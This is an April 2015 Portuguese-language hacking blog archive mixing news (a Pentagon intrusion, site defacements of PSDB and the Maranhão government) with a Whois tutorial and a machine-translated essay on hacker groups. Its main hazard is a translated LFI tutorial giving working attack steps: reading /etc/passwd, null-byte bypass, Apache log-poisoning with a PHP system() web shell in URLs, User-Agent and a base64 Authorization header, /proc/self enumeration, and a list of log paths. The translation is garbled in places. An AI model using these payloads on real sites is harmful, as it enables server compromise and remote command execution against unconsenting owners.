sexta-feira, 24 de abril de 2015

Hackers russos invadem rede de informática do Pentágono

Secretário de Defesa dos EUA, Ashton Carter, em entrevista no Pentágono, em Washington. (Foto: James Lawler Duggan/Reuters)

Hackes invadiram recentemente uma rede de informática do Pentágono, afirmou nesta quinta-feira (23) o secretário de Defesa dos Estados Unidos, Ashton Carter, na Universidade de Stanford, na Califórnia.

Carter explicou que a invasão foi detectada por profissionais que protegem as redes não classificadas como secretas do Pentágono. Após a detecção, os hackers foram identificados em menos de 24 horas pelos especialistas do Pentágono, disse Carter.

"Após recorrer informação útil sobre seu modo de operar, analisamos sua atividade na rede, estabelecemos envolvimento com a Rússia e os expulsamos, de modo a minimizar sus possibilidades de poder retornar", explicou.

O diretor nacional de inteligência dos Estados Unidos, James Clapper, afirmou em janeiro que "a ameaça cibernética russa é mais significativa do que havíamos estimado".

O secretário de Defesa Ashton Carter permanecerá quinta e sexta-feira no Vale do Silício para estreitar laços com as indústrias de alta tecnologia e recrutar os engenheiros e inovadores que o Pentágono precisa.

quinta-feira, 23 de abril de 2015

Como fazer Consultas Web – Whois [Windows]



Hoje vamos trazer um tutorial simples e muito pedido de como fazer consultas web usando o windows, essas consultas podem trazer informações preciosas sobre nosso alvo como a versão do servidor, e-mail da host, domínios alocados, entre outras informações. Para isso usaremos o recurso Whois a qual explicaremos abaixo.

Whois:

É um protocolo TCP (porta 43) específico para consultar informações de contato e DNS sobre entidades na internet. Uma entidade na internet pode ser um nome de domínio, um endereço IP ou um AS (Sistema Autônomo).

O protocolo WHOIS apresenta três tipos de contatos para uma entidade: Contato Administrativo (Admin Contact), Contato Técnico (Technical Contact) e Contato de Cobrança (Registrant Contact). Estes contatos são informações de responsabilidade do provedor de internet, que as nomeia de acordo com as políticas internas de sua rede.

Vale lembrar que outras empresas internacionais ainda podem ter um recurso de travar essas informações para as pessoas, chamado de Whois privado.

Primeiro baixe o Whois:

Download: http://www.4shared.com/rar/zU5DP1Olba/Whois.html?

Depois extraia o Whois.exe para o Disco Local “C:”

1° Abra o CMD, e digite “cd/”



2° Digite “whois (site)” depois dê um Enter



3° Os dados serão processados.



Agora podemos analisar todos os dados extraídos, lembrando que é um consulta passiva.

quarta-feira, 22 de abril de 2015

The Fall of Hacker Groups

- [Conteúdo


   1. Introdução
   2 - Background
   3 - Hoje em dia
   4. Conclusão
   5 - Shouts
   6 - Bibliografia
   7 - Notas



- [1. Introdução

A parte mais cedo, maior de hackers história muitas vezes tinham congregações como
protagonistas. De CCC no início dos anos 80 para TESO na década de 2000, por meio de Lode,
MoD, CDC, L0pht, e as muitas outras equipes cantadas e anônimos de heróis de hackers,
nossa cultura foi criada, em forma, e imortalizado por seus artigos, ferramentas,
e ações.

Este artigo discute por que recentemente não vemos muitos grupos de hackers
mais, e por esses que nós fazemos, como o Anonymous e seu satélite
esforços, não conseguem ter o mesmo impacto cultural como seu
antepassados.

- [2 - Background
Hacking é, em sua essência, um movimento subterrâneo. Aqueles que tomam
parte em que sempre foram os que (ab) usado a tecnologia de formas para além
o conhecimento do grande base de utilizador. Ele está intimamente ligado a um intenso
esforços na inauguração informações previamente desconhecidas, bem como na partilha
essas descobertas. Estas premissas são verdadeiras, enquanto nós sabemos hackers:
Desde que os computadores mal tinha nenhum usuário até a massificação informática
de hoje.

A natureza dos interesses de hackers intrinsecamente apresenta dificuldades:
crescente conhecimento sobre qualquer coisa é difícil. Ela exige investigação pesada,
experimentação, e pode se transformar em uma jornada sem fim se os objetivos não são
cuidadosamente definida. Assim como em qualquer campo de estudos científicos, que prevê um
boa quantidade de colaboração, uma atitude que, felizmente para os hackers, foi
grandemente habilitado pelo advento das redes de computadores e, principalmente, a
Internet.

As redes de computadores cada vez mais, foi possível transmitir ilimitada e
informações não censuradas em toda a sua extensão geográfica, com pouco esforço,
com poucos custos, e em praticamente nenhum momento. A partir da comunicação
desenvolvimento ponto de vista, seria de esperar que os acontecimentos que se seguiram à
80 para os nossos dias levaria a uma progressão geométrica do número de
comunidades de hackers. Com efeito, hacking, indiscutivelmente, cresceu. Hacker
comunidades, definitivamente não. Então, o que deu errado?

- [3 - Hoje em dia
Vivemos em dias de criatividade limitada. Além disso, como contraditório que possa
parece, parece particularmente rara para a criatividade que surjam grupos ou
equipes. Comunidades, ao invés de indivíduos, deve ser mais intelectualmente
o poder de criar, mas ultimamente temos vindo a assistir a força do
solo, a idade do ego. Isso, é claro, quando vemos qualquer coisa que
chama a atenção para a originalidade, que é um prazer sempre escassos.

Em "Time Wars" [1], Mark Fisher explica que o pós-fordismo nos levou a
essa incapacidade catatônico para inovar. Nossa compulsão quase obsessiva por
trabalho consome não só o nosso tempo, na forma literal de horas de trabalho, mas
nossas mentes, por que nos distrai de tudo o resto que poderia estar fazendo
de outro modo. Essas distrações incluem nossa conexão incessante para onipresente
meios de comunicação (por exemplo, as verificações freqüentes para novo e-mail, ou acessos aos serviços sociais
redes em dispositivos móveis), bem como um aumento da preocupação com a financeira
estabilidade e provisionamento, uma preocupação que cresce à medida que o bem-estar é invariavelmente
aparado por ambos os governos e do setor privado.

É importante notar que as nossas preocupações capitalistas estão mais profundamente enraizada
em nós do que pode parecer à primeira vista, mesmo na mais politicamente diversificada
pessoas. Apoiando-se não é fácil, ele não vem de graça. Obtendo
alguma educação, encontrar um emprego, ficar up-to-date ... independentemente do que
suas aspirações são, o que quer que você se sinta obrigado a fazer é, provavelmente, muito,
já. E isso provavelmente envolve uma prevalência de "cuidando da sua vida
o negócio ".

O unsettlement criado em nossos pensamentos afeta solidariedade intelectual em
ainda mais graves formas do que faz criação individual. Simplificando, se ele
Já é tão difícil para uma pessoa para se concentrar longe destes
"distrações" e em produtividade inspirada, e muito menos para um grupo de
participar de uma mente coletiva verdade. Os laços que unem coletivo-minded
partidos juntos tomar dedicação para construir, e as nossas preocupações egoístas fazer
não ajuda (ver nota "A"). Não só é necessário empenho para o real
trabalho a ser realizado, mas também para identificar os valores e objetivos comuns
que permitem uma verdadeira conectividade humana.

Note que isto não diz respeito a colaboração, tanto quanto ele faz
_collectiveness_. Collaboration normalmente divide o processo criativo
de uma forma que pode ser incremental alcançado com muito auto-suficiente,
contribuições individualista. Tal é o caso da maioria de código aberto
projetos de software. As funções são muito bem segregados para que um mínimo de
integração humano é necessário, na medida do desenvolvimento de software mais moderno
processos de ir, de qualquer maneira. Um verdadeiro "mente coletiva" [2], não pode existir sem a
apoio de um vínculo cognitivo mais forte, mais uníssono. Engraçado, o
variantes populares da LOIC, a ferramenta de DDoS usado por "Anonymous", contêm uma
O recurso de "mente da colmeia" (ou seja, a obtenção de um alvo automaticamente a partir de um determinado IRC
servidor e canal e disparando seus pacotes contra ela). Você gostaria que fosse
assim tão fácil.

O conceito de "consciência coletiva" foi estabelecido pela primeira vez por Emile
Durkheim que, em seu livro de 1893 "A divisão do trabalho na sociedade",
expressa "de que as sociedades mais primitivas são, mais semelhanças
(Especialmente como refletido na religião primitiva) há entre o
indivíduos que as compõem; inversamente, quanto mais um povo civilizado, o
mais facilmente distinguíveis seus membros individuais ", como colocar por R. Alun
Jones [3].

Bem, na sequência (ou apesar) a adoção próspera do ateísmo e
agnosticismo como professou na Internet e outros meios de comunicação populares, é
entendido que as crenças religiosas estão em uma baixa, tomando um pouco do que
sociedades tradicionalmente viam como um ponto de unidade. Na verdade, parece haver
uma busca cada vez maior para a singularidade no homem moderno, especialmente a
das metrópoles aparentemente superpopulosas (ver nota "B"). nisso
multidão de interessantes, personas em circulação sem fim, queremos brilhar
de alguma forma, para provar a nós mesmos diferente e original. No final, ele se transforma
em uma batalha inútil, contra Deus-sabe-quem, por singularidade aparente.
Em vez de pegar o próximo, queremos nos propusemos para além, e
assim, notável.

- [4. Conclusão
A vida moderna quase conspira contra o coletivo. Estamos atormentado por um
fluxo incessante de informações, bem como as preocupações diárias de um eternamente
, a vida injustificada inseguro. Além disso, teme o pensamento de ser
da mesma forma, de compartilhar vários pontos de vista e opiniões. Como tal, estamos transformando
progressivamente julgamento de quem nós devemos fazer parceria, com base
que "eles não entendem". Em Hacking, ainda implicações no
delicado assunto de confiança, o que exigiria um ensaio sobre si mesma, dado
a inegável importância da matéria adquirida ao longo dos anos.

Se os nossos pensamentos sobre a criação de grupos de hackers seriam resumidos, este é
como ficaria: Ninguém nunca se sente como nós fazemos. Eles não são para ser
confiável e não temos o tempo para eles. A única atitude consonante
a nossa busca por uma vida confortável e seguro é nos restringir ao nosso
próprias limitações, ignorar a vida inteligente lá fora, e render-se
a mediocridade que a nossa sociedade tem condenado o nosso tempo de lazer para.

- [5 - Shouts

Minhas únicas confirmações ir para quem lê este meio e coloca seu / sua
pensamentos para ele. Aguardo ansiosamente por seus comentários.

- [6 - Bibliografia


1 - "Time Wars", Mark Fisher - http://www.gonzocircus.com/xtrpgs/
     incubar-exclusivos-ensaio-Time-guerras especiais-by-mark-pescador /
2 - "Consciência Coletiva", Wikipedia -
     http://en.wikipedia.org/wiki/Collective_consciousness
3 - Trecho de "Emile Durkheim: An Introduction to Quatro Grandes Obras",
     Robert Alun Jones - http://durkheim.uchicago.edu/Summaries/dl.html

- [7 - Notas
A) No que diz respeito às redes sociais, enquanto eles estão a construção de comunidades válida
mecanismo na natureza, egoísmo prevalece no uso comum, por meio do
prazer indulgente que os combustíveis crônica "plugado nariz", às vezes voyeur, em
vezes exibicionista e necessitados.

B) É sem dúvida o caso, porém, que o aspecto globalizante do
Internet trouxe a sensação de comunalidade perturbador para os cidadãos
de mesmo os lugares mais populosos.


terça-feira, 21 de abril de 2015

Hacktivistas do grupo ASOR Hack Team invadiram o site oficial do partido PSDB nacional.


[ + ] PSDB HACKED!!
Hacktivistas do grupo ASOR Hack Team invadiram o site oficial do partido PSDB nacional.
-----------------------------------------
Check: http://www.psdb.org.br/hacked-by-9lulz/
Check: http://www.psdb.org.br/hacked-9lulzalerthacked-9lulz/
Zone-h:https://www.zone-h.org/mirror/id/24114820
-----------------------------------------
Criando um posto e deixando a seguinte mensagem:
"PSDB HACKED by: 9Lulz
A história dos dois partidos nem sempre envolveu tanta rivalidade. Lutaram juntos contra a ditadura militar e pelas "Diretas Já", estiveram num mesmo palanque contra Collor durante as eleições e depois em seu impeachment. Antes do Plano Real, Tasso Jereissati, então do PSDB, estava pronto pra ser vice de Lula em uma chapa, mas Fernando Henrique conseguiu uma parceria com PFL (atual DEM) e ganhou as eleições.
Amizade desfeita, PT fez forte oposição por 8 anos, até chegar à presidência e então tivemos o PSDB nesse papel, o que para aquele momento histórico era até engraçado. Não é novidade em debates de TV a disputa sobre quem criou o plano real, os programas assistencialistas, e uma série de medidas do governo federal que, verdade seja dita, foram elaboradas em conjunto por esses partidos, que mesmo em oposição sempre souberam quando apertar as mãos caso fosse preciso. Para além dos programas, os partidos compartilham as metodologias de manutenção de poder (os "mensalões") e a estratégia de dar até as cuecas para o PMDB para garantir seu apoio nas votações. Por fim, dividem uma coisa bastante importante: financiamento de campanha. Vamos falar disso com mais calma logo mais.
São quatro os pilares que sustentam os projetos presidenciais de ambos os governos: democracia, estabilidade monetária, transferência de renda e crescimento econômico. Cada um faz do seu jeitinho, mas a cartilha é essa.
Publicamente, um defende uma democracia meritocrática, outro o diálogo com movimentos populares. Na prática, ambos servem ao corporativismo que sustenta suas campanhas políticas.
Publicamente, um defende aquecimento do mercado pela abertura internacional e outro pelo combate à desigualdade social. Na prática, ambos fazem acordos com bancos, fraudam licitações e favorecem as empreiteiras que os colocam ali."
Leia o texto por inteiro:
http://pastebin.com/tB7cAep7
ASOR Hack Team
‪#‎Anonymous‬

domingo, 19 de abril de 2015

LFI (local File Inclusion) Injection pentesting TUTORIAL



Originalmente escrito por: "Fredrik Nordberg Almroth"

Inclusão Arquivo Local

Como o título diz, este é um guia descritivo e "short" sobre

vários métodos para explorar usando uma inclusão de arquivos local (LFI).

Vou cobrir os seguintes tópicos:


• Bytes Veneno NULL

• Intoxicação Log

• / proc / self /

• Intoxicação Log Alternativa

• envio de imagens suspeito

• A injeção de código com o uso de e-mails

• Criatividade

Por: Fredrik Nordberg Almroth



Então a pergunta é. O que é um LFI?

A LFI é, como o título diz,

um método para servidores / scripts para incluir arquivos locais no tempo de execução,

a fim de tornar complexos sistemas de chamadas de procedimento.

Bem, a maioria das vezes, você encontrar as vulnerabilidades LFI em URL do

das páginas da web.

Principalmente porque os desenvolvedores tendem a gostar de o uso de requisições GET

quando incluindo páginas.

Nada mais. Nada menos.

Então, agora, vamos continuar vamos?

Como você encontrar (impressão digital) eles?

Vamos dizer que você encontrar a seguinte URL:

Code:
http://site.com/this/exploit/do.php?
not=exist.php&for=real

Nota, que esta vai para o URL do.php que é um sub-domínio de
site.com.

Ele tem vários parâmetros para o do.php interno para interpretar, a
não e para a variável.

Vamos estudá-los um pouco mais.
A não variável contém o valor de "exist.php", eo de
variável contém "real".

Agora descobriu-se bastante óbvio, não é?
A variável não parecem tomar outro arquivo PHP como um argumento,
mais possivelmente para inclusão!

Viva!

Vamos tentar brincar com ele!

O que agora?

Vamos tentar mexer com o URL para ver o que podemos fazer com ele.

Vamos mudar o conteúdo da variável para não "/ etc / passwd" e

ver o que acontece.

É claro que você pode alterar o / etc / passwd para qualquer outro arquivo do seu
escolha, mas vamos ficar com ela por todo este tutorial.

Code:
http://site.com/this/exploit/do.php?
not=/etc/passwd&for=real

Vamos conferir o resultado!

Se você obter um resultado procurando algo parecido com isto:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

Então, senhor. Você já fez isso corretamente. Você encontrou um LFI

vulnerabilidade!

O arquivo / etc / passwd é lido por todos em sistemas * NIX.
Isso significa que você pode, por uma chance de 99%, lê-lo.

A menos que alguém mudaram permissões ou trocar o
configuração open_basedir.

Mas, mais do que alguma outra vez!

Agora vamos tentar um outro cenário.

Digamos que o programador do site codificado como este:

Code:
<?php “include/”.include($_GET['for'].“.php”); ?>

Como poderíamos fazer, então? Não podemos ler / etc / passwd porque o script
Php anexa ao fim do ficheiro.

O que fazer, o que fazer ...

Alegremente para você, não há outro truque aqui.

Veneno NULL Byte.

O byte NULL, é um byte especial usado em todo o fundo

do seu computador (ou seus alvos).

É a representação binária: 00000000.

Sim. 8 zeros em binário, ou a representação hexadecimal

0x00.

Certo ...

Um dos usos deste byte especial é encerrar strings.

Se você tiver sido programação por um tempo, você deve saber o que é um
string é.

Uma quantidade de texto! Ok, isso soa complexo agora.

Mas esse método é realmente muito simples.

Para ignorar a concatenação .php, nós simplesmente anexar após a nossa

nome do arquivo.
Code:
http://site.com/this/exploit/do.php?for=/etc/passwd
E espero que, o resultado é mais uma vez:
root:x:0:0:root:/root:/bin/bash (…)

Awesome, agora podemos ler qualquer arquivo no servidor (com o
privilégios da conta no servidor temos agora obtidos)!
Agora você pode perguntar: como é que podemos executar código por isso?
A resposta é ...

Log intoxicação:

Dizer que estamos explorando um servidor Apache normal de planície.

Por padrão, ele cria dois arquivos de log chamado access_log e

error_log no servidor.

Se mexer esses logs podemos fazer upload com sucesso nossa própria PHP

código no servidor, o que pode dar-lhe a execução do comando remoto

se quiser, a escolha é sua.

A pergunta é: onde estão os logs são armazenados?

Alegremente para você, eu compilei uma lista pequena.
Aqui você vai:

Code:
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log

Agora, há dois bons métodos para prosseguir, em função dos quais
log que você escolher.

O melhor (na minha opinião) é acessando o error_log.
Este método é um pouco fora da caixa.

Digamos que você encontrar um LFI neste servidor, por simples indo para esta URL,
Código PHP serão salvos no error_log:

Code:
http://site.com/<?PHP+$s=$_GET;@chdir($s['x']);echo@system($s['y'])?>

Now try to reach it by going here:
Code:
http://site.com/this/exploit/do.php?for=/var/log/apache/logs/error_log&x=/&y=uname

Se o resultado diz algo como Linux, então o seu execução de código
foi bem sucedida.
Yeah yeah, você começa o ponto. Ela fica armazenada no error_log
porque a
Code:
<?PHP $s=$_GET;@chdir($s['x']);echo@system($s['y'])?>
arquivo não existem.

Método # 2; acessando o access_log. É um pouco mais

complicado, a melhor maneira de fazer isso é colocar o código PHP em sua

user-agent.

Há um ótimo plug-in para o Firefox chamado "User Agent Switcher"

para fazer isso em tempo real.

Fora isso, é a mesma coisa.
Vá para:
código:
http://site.com/

Ou qualquer outro arquivo acessível no servidor, com o seu agente de usuário

falsificado no seu trecho de PHP.

Então vá para o access_log, a fim de executar o código; por exemplo:

Code:
http://site.com/this/exploit/do.php?for=/var/log/apache/logs/access_log&x=/&y=<<command goes here>>

Sim, com certeza, você é tão legal, você pode executar o seu próprio código! Agora, vamos ser hardcore.
/ Proc / self:

O kernel Linux é fascinante.
Eu não tenho certeza se você já ouviu isso, mas o / proc / self é um link simbólico (symlink) indo para a instância da meta HTTP
servidor.
Há várias coisas que você pode fazer usando este link, um é
fazer o access_log-método, simplesmente spoofing seu agente de usuário para
Código PHP, em seguida, tentar incluir

o / proc / self / Environ.

Todo mundo sabe que esses dias.

Isso não é divertido. No entanto o seu código será executado!

Vamos seguir em frente para mais ... métodos pouco frequentes.

Você pode obter o arquivo de configuração do HTTP, simplesmente tentando

include / proc / self / cmdline,

porque a maioria das vezes o arquivo de configuração é definida por uma linha de comando
argumento,

um simples, mas um "recurso" cool, nada malicioso aqui, isso é
apenas a forma como ele funciona.

O que você escolhe para fazer com o arquivo de configuração é com você.
A localização (s) do arquivo de log tendem a estar lá ...

Você tem o aperto agora, eu só vou continuar escrevendo.

Existe ainda uma outra maneira de resolver os log-arquivos usando este
vincular, por simplesmente ir à descrição do arquivo de log (o
executando stream).
Handy?
• Sim

Não há necessidade de que você execute um dicionário-ataque, a fim de resolver o
diferentes log-arquivos ou para incluir o / proc / self / cmdline.

Agora, como é que vamos acessar essas descrições de arquivo?
Bem, senhor, o / proc / self tendem a ter uma pasta (?) Chamado fd.
Você adivinhou certo.

fd fazer stand para a descrição de arquivo.
O conteúdo dentro fd é numérico ID vai abrir diferente
arquivos.

Assim, a maneira mais fácil para nós encontrar seja, é simplesmente uma iteração nosso caminho

através dos.

Code:
http://site.com/this/exploit/do.php?for=/proc/self/fd/0
http://site.com/this/exploit/do.php?
for=/proc/self/fd/1
http://site.com/this/exploit/do.php?
for=/proc/self/fd/2
http://site.com/this/exploit/do.ph p ?
for=/proc/self/fd/N

Cedo ou tarde, você vai encontrar um dos log-arquivos.
Ao fazer isso você só ir com o access_log ou o error_log
método (s).
Agora a sério. Alguma vez você já teve algum sucesso com o ordinário
"Log envenenamento" métodos?
Quero dizer, como em 95% dos casos os seus pedidos fica URI codificados,
e por que estragar seu código.
Então, aqui vem um método alternativo:
Intoxicação Log Alternativa:
Apache tem a tendência de fazer login o usuário autorizado se houver é
especificada.
O cabeçalho de autorização é uma parte do protocolo HTTP, eu aposto
você já viu isso.
Ele cria um prompt pedindo um nome de usuário e senha como htaccess
fazer quando você tenta alcançar uma pasta protegida.
Internet Explorer faz um prompt parecido com isto:
Sim, bem. Os base64 usuário e senha é enviada codificada
com: como um separador.
E como você deve ter percebido, os base64 não vai conseguir URIencoded!
Então, pelo fornecimento do cabeçalho no seu pedido HTTP:
Autorização: Básico
PD9QSFAgJHM9JF9HRVQ7QGNoZGlyKCRzWyd4J10pO2VjaG9Ac3lzdGVtKCRzWyd5J1
0pPz46
O código vai ficar intocada, e simplesmente não embalada pelo Apache
direto para os logs.
A base 64 é a pequena carga útil PHP eu usei anteriormente,
apenas com um: no final, a seguir o HTTP RFC do.
Agora, quando estamos no a ele, explorando através de diferentes métodos e
stuff.
Por que não explorar LFI com um JPG?
Suspeito de upload de imagem:
Sim, você me ouviu. Você pode usar uma imagem, a fim de executar um código
através da utilização de uma vulnerabilidade LFI.
No entanto, você precisa de um software especial para fazer isso para você.
O ataque consiste em mudar os dados EXIF ​​da imagem de sua
escolher.
Digamos que você está explorando uma comunidade, que permite o upload de imagens, por
vamos dizer, o seu avatar.
Por adulteração dos dados EXIF ​​e por encontrar um LFI
você pode assumir o controle total! Legal né?
Os dados EXIF ​​tendem a manter o modelo da câmera, ano, local,
localização, etc ... Quando a imagem foi capturada, mas, como foi provado antes,
é bastante fácil de adulterar.
A injeção de código com o uso de e-mails:
Digamos que seu servidor de destino tem porta 109 ou 110 open (POP2 ou POP3) para
manipulação de e-mails.
Você pode enviar um e-mail para o servidor HTTP-usuário na caixa de destino.
Like: apache@site.com
E, em seguida, tentar incluir o / var / spool / mail / apache se isso existe.
É possível executar esta através bem.
No entanto, não é muito comum encontrar este específico explorar.
É claro que o e-mail que você envia conterá o código PHP para você
executar.
Há centenas literárias de maneiras de realizar este ataque
dependendo do correio-server running back-end.
Qmail, por exemplo, armazena os e-mails recebidos em / var / log / maillog
por padrão, mas como já foi dito antes, este é pensar fora da
caixa.
Criatividade:
Por que parar aqui?
Tenho certeza que o kernel do Linux, IRIX, AIM, Windows, SunOS, BSD e
outros OS'es proporciona ainda mais interessante explorar cenários.
Será que eles têm SSH aberta?
Se assim for, tentar injetar código PHP como o nome de usuário SSH e ir pegar o
Log SSH.
Será que vai funcionar? Talvez?
Pode a incorporação de conteúdos maliciosos como o campo JPG EXIF ​​ser
feita dentro de um arquivo MP3?
Tente você mesmo. Seja criativo.

 Traduzido por Yahoo Hacking Br
Matéria Original 
http://ethicalleets.blogspot.com.br/2012/08/lfi-local-file-inclusion-injection.html



sábado, 18 de abril de 2015

[POLITICA]Alckmin usa dinheiro público para financiar ataques ao PT



O governo de São Paulo, administrado por Geraldo Alckmin (PSDB), financia há quase dois anos um blogueiro que distribui propaganda contra o PT na internet.
Segundo reportagem do jornal “Folha de S. Paulo“, publicada neste sábado (18), por meio de um contrato com a empresa Appendix Consultoria, a Subsecretaria de Comunicação do Estado, órgão vinculado à Casa Civil do Estado, repassa cerca de R$ 70 mil por mês ao responsável pelo site “Implicante”.
A página publica notícias, vídeos e memes com ataques ao PT, à presidente Dilma Rousseff e ao ex-presidente Lula.
O administrador do blog é o advogado Fernando Gouveia, que usa o pseudônimo Gravataí Merengue nas redes sociais e também se diz responsável pelo site “Reaçonaria”.
A empresa Appendix Consultoria foi criada em janeiro de 2013 e recebe, desde junho daquele ano, pagamentos do governo estadual por meio da agência de publicidade Propeg, uma das três que cuidam da propaganda do governo estadual.
O “Implicante” tem quase meio milhão de seguidores no Facebook. O material produzido pelo site costuma ser replicado nas redes sociais e por outros blogs políticos.
De acordo com a reportagem, documentos oficiais confirmam que a Propeg pagou a Appendix por serviços de “revisão, desenvolvimento e atualização das estruturas digitais” da Secretaria de Estado da Cultura. Em nota, a agência confirmou a contratação.
Da Redação da Agência PT de Notícias

Site do Governo do Maranhão é invadido e modificado por hackers


O site do Governo do Maranhão foi invadido por hackers na madrugada desta sexta-feira (17). Quem acessava a página visualizava a imagem de um caveira vermelha e logo abaixo o vídeoclipe "Never Gonna Give Uou Up", do cantor Rick Astley.  Na página aparecia, ainda, a mensagem "Hackeado por Ecx 64". Por volta das 7h30 a página hackeada foi tirada do ar e por volta das 9h20 horas o site voltou ao normal.